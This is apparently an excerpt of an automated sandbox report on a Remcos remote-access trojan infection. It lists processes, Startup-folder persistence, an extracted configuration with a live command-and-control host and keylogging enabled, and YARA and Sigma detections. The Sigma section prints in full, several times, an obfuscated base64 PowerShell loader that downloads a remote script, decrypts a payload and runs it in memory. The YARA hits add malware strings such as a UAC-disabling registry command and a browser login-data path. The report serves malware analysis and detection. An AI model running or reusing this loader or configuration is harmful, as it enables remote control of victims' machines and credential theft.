JHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 340 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000035.00000002.3010363046.0000000008EB7000.00000002.10000000.00040000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000003A.00000002.3443687584.0000000008D0C000.00000002.10000000.00040000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x708:$a1: Remcos restarted by watchdog!
      • 0xc80:$a3: %02i:%02i:%02i:%03i
      0000002F.00000002.2572521172.0000000005EE8000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x7aa5a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      0000002A.00000002.2399349513.00000000066F4000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x7a272:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000019.00000002.1875086180.0000000002D29000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 101 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        15.2.powershell.exe.8c91288.2.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          15.2.powershell.exe.8c91288.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            15.2.powershell.exe.8c91288.2.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              15.2.powershell.exe.8c91288.2.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x69308:$a1: Remcos restarted by watchdog!
              • 0x69880:$a3: %02i:%02i:%02i:%03i
              15.2.powershell.exe.8c91288.2.unpackREMCOS_RAT_variantsunknownunknown
              • 0x63594:$str_a1: C:\Windows\System32\cmd.exe
              • 0x63510:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x63510:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x63a10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x64010:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x63604:$str_b2: Executing file:
              • 0x6444c:$str_b3: GetDirectListeningPort
              • 0x63e00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x63f80:$str_b7: \update.vbs
              • 0x6362c:$str_b9: Downloaded file:
              • 0x63618:$str_b10: Downloading file:
              • 0x636bc:$str_b12: Failed to upload file:
              • 0x64414:$str_b13: StartForward
              • 0x64434:$str_b14: StopForward
              • 0x63ed8:$str_b15: fso.DeleteFile "
              • 0x63e6c:$str_b16: On Error Resume Next
              • 0x63f08:$str_b17: fso.DeleteFolder "
              • 0x636ac:$str_b18: Uploaded file:
              • 0x6366c:$str_b19: Unable to delete:
              • 0x63ea0:$str_b20: while fso.FileExists("
              • 0x63b49:$str_c0: [Firefox StoredLogins not found]
              Click to see the 7 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOyc